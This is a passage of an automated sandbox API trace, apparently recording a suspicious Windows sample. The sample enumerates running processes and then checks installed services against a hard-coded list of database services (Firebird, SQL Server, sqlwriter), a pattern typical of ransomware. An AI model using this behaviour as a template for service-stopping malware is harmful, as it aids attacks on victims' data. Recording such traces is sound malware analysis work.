th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.756] lstrlenW (lpString="svchost.exe") returned 11 [0294.756] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0294.757] lstrlenW (lpString="dwm.exe") returned 7 [0294.757] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.758] lstrlenW (lpString="svchost.exe") returned 11 [0294.758] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.759] lstrlenW (lpString="svchost.exe") returned 11 [0294.759] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3f, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.759] lstrlenW (lpString="svchost.exe") returned 11 [0294.759] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x16c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.760] lstrlenW (lpString="svchost.exe") returned 11 [0294.760] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.761] lstrlenW (lpString="svchost.exe") returned 11 [0294.761] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x490, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.761] lstrlenW (lpString="svchost.exe") returned 11 [0294.762] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x52c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.762] lstrlenW (lpString="svchost.exe") returned 11 [0294.762] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x584, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.763] lstrlenW (lpString="svchost.exe") returned 11 [0294.763] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.763] lstrlenW (lpString="svchost.exe") returned 11 [0294.763] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.764] lstrlenW (lpString="svchost.exe") returned 11 [0294.764] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0294.764] lstrlenW (lpString="spoolsv.exe") returned 11 [0294.765] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.765] lstrlenW (lpString="svchost.exe") returned 11 [0294.765] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x52c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0294.766] lstrlenW (lpString="audiodg.exe") returned 11 [0294.766] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0294.767] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0294.767] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0294.767] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0294.767] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0294.768] lstrlenW (lpString="Memory Compression") returned 18 [0294.768] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0294.768] lstrlenW (lpString="sihost.exe") returned 10 [0294.769] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0294.769] lstrlenW (lpString="svchost.exe") returned 11 [0294.769] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x938, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0294.770] lstrlenW (lpString="taskhostw.exe") returned 13 [0294.770] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0xa10, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0294.770] lstrlenW (lpString="explorer.exe") returned 12 [0294.770] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0294.771] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0294.771] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0294.772] lstrlenW (lpString="SearchUI.exe") returned 12 [0294.772] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x744, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0294.972] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0294.972] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0294.973] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0294.973] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0xa24, pcPriClassBase=8, dwFlags=0x0, szExeFile="wdgmug.exe")) returned 1 [0294.973] lstrlenW (lpString="wdgmug.exe") returned 10 [0294.973] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xdd0, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0294.974] lstrlenW (lpString="cmd.exe") returned 7 [0294.974] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0294.975] lstrlenW (lpString="conhost.exe") returned 11 [0294.975] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="mode.com")) returned 1 [0294.975] lstrlenW (lpString="mode.com") returned 8 [0294.976] Process32NextW (in: hSnapshot=0x47c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="mode.com")) returned 0 [0294.976] CloseHandle (hObject=0x47c) returned 1 [0294.976] Sleep (dwMilliseconds=0x1f4) [0295.921] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x401a148 [0295.923] EnumServicesStatusExW (in: hSCManager=0x401a148, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 0 [0295.924] GetLastError () returned 0xea [0295.924] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1bc4) returned 0x4137f20 [0295.924] EnumServicesStatusExW (in: hSCManager=0x401a148, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x4137f20, cbBufSize=0x1bc4, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x4137f20, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 1 [0295.925] CloseServiceHandle (hSCObject=0x401a148) returned 1 [0295.925] lstrlenW (lpString="AppXSvc") returned 7 [0295.925] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0295.925] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0295.925] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0295.925] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0295.925] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0295.925] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0295.925] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0295.925] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0295.925] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0295.925] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0295.925] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0295.925] lstrlenW (lpString="Audiosrv") returned 8 [0295.925] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0295.925] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0295.925] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0295.925] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0295.925] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0295.925] lstrlenW (lpString="BFE") returned 3 [0295.925] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0295.926] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0295.926] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0295.926] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0295.926] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0295.926] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0295.926] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0295.926] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0295.926] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0295.926] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0295.926] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0295.926] lstrlenW (lpString="CDPSvc") returned 6 [0295.926] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0295.926] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0295.926] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0295.926] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0295.926] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0295.926] lstrlenW (lpString="ClickToRunSvc") returned 13 [0295.926] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0295.926] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0295.926] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0295.926] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0295.926] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0295.926] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0295.926] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0295.926] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0295.926] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0295.926] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0295.926] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0295.926] lstrlenW (lpString="CryptSvc") returned 8 [0295.927] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0295.927] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0295.927] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0295.927] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0295.927] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0295.927] lstrlenW (lpString="DcomLaunch") returned 10 [0295.927] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0295.927] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0295.927] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0295.927] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0295.927] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0295.927] lstrlenW (lpString="DeviceAssociationService") returned 24 [0295.927] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0295.927] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0295.927] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0295.927] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0295.927] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0295.927] lstrlenW (lpString="Dhcp") returned 4 [0295.927] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0295.927] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0295.927] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0295.927] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0295.927] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0295.927] lstrlenW (lpString="Dnscache") returned 8 [0295.927] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0295.927] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0295.927] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0295.927] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0295.928] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0295.928] lstrlenW (lpString="DPS") returned 3 [0295.928] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0295.928] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0295.928] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0295.928] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0295.928] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0295.928] lstrlenW (lpString="DusmSvc") returned 7 [0295.928] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0295.928] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0295.928] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0295.928] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0295.928] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0295.928] lstrlenW (lpString="EventLog") returned 8 [0295.928] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0295.928] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0295.928] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0295.928] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0295.928] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0295.928] lstrlenW (lpString="EventSystem") returned 11 [0295.928] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0295.928] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0295.928] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0295.928] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0295.928] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0295.928] lstrlenW (lpString="FontCache") returned 9 [0295.929] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0295.929] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0295.929] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0295.929] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0295.929] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0295.929] lstrlenW (lpString="gpsvc") returned 5 [0295.929] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0295.929] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0295.929] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0295.929] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0295.929] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0295.929] lstrlenW (lpString="iphlpsvc") returned 8 [0295.929] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0295.929] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0295.929] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0295.929] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0295.929] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0295.929] lstrlenW (lpString="KeyIso") returned 6 [0295.929] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0295.929] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0295.929] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0295.929] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0295.929] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0295.929] lstrlenW (lpString="LanmanServer") returned 12 [0295.929] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0295.930] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0295.930] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0295.930] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0295.930] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0295.930] lstrlenW (lpString="LanmanWorkstation") returned 17 [0295.930] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0295.930] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0295.930] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0295.930] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0295.930] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0295.930] lstrlenW (lpString="lfsvc") returned 5 [0295.930] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0295.930] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0295.930] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0295.930] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0295.930] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0295.930] lstrlenW (lpString="lmhosts") returned 7 [0295.930] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0295.930] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0295.930] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0295.930] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0295.930] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0295.930] lstrlenW (lpString="LSM") returned 3 [0295.930] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0295.930] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0295.930] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0295.930] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0295.930] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0295.930] lstrlenW (lpString="MpsSvc") returned 6 [0295.931] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0295.931] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0295.931] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0295.931] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0295.931] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0295.931] lstrlenW (lpString="NcbService") returned 10 [0295.931] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0295.931] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0295.931] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0295.931] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0295.931] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0295.931] lstrlenW (lpString="netprofm") returned 8 [0295.931] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0295.931] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0295.931] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0295.931] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0295.931] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0295.931] lstrlenW (lpString="NgcSvc") returned 6 [0295.931] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0295.931] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 